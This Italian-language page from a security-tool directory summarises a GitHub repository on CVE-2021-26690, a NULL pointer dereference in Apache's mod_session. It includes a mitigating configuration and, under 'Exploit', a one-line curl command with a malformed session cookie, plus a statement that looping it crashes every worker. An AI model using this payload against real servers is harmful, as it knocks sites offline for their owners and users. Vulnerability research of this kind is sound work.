Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-26690---Apache-mod_session — CVE-2021-26690 diffing delle patch - Apache HTTP mod_session dereferenziamento di puntatore NULL | Kitploit
Strumenti/GitHubGitHub/7own/cve-2021-26690---apache-mod_session
Analisi delle VulnerabilitàExploitSicurezza WebPenetration Testing
GitHub7own/cve-2021-26690---apache-mod_session

CVE-2021-26690---Apache-mod_session

CVE-2021-26690 diffing delle patch - Apache HTTP mod_session dereferenziamento di puntatore NULL

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
111 anno faNon ancora revisionato

Patch diffing per CVE-2021-26690 - Apache mod_session

Questa vulnerabilità è un dereferenziamento di puntatore nullo all'interno del modulo mod_session di Apache. Causerà un denial of service per i processi figli di httpd di Apache. Utilizzando un ciclo ripetitivo, ogni worker di Apache si bloccherà, portando a un denial of service per tutti i client che si connettono o sono connessi al sito web.

Questa vulnerabilità è stata scoperta inizialmente da @antonio-morales.

Per le fasi complete del processo, fare riferimento al PDF in questo repository.

Limitazione

Se il server implementa l'opzione SessionCryptoPassphrase tramite mod_session_crypto, il cookie verrà crittografato e codificato in base64.

root@kitploit:~
<IfModule mod_session.c>
Session On
SessionCookieName session path=/
SessionCryptoPassphrase "YourSecurePassphrase"
SessionMaxAge 1800
</IfModule>

In questo caso, le coppie di cookie di sessione non possono essere manomesse e il denial of service non può verificarsi come descritto.

Exploit

root@kitploit:~
curl http://$IP:$PORT/ -v -b 'session=expiry=123456789&='
Scarica lo strumento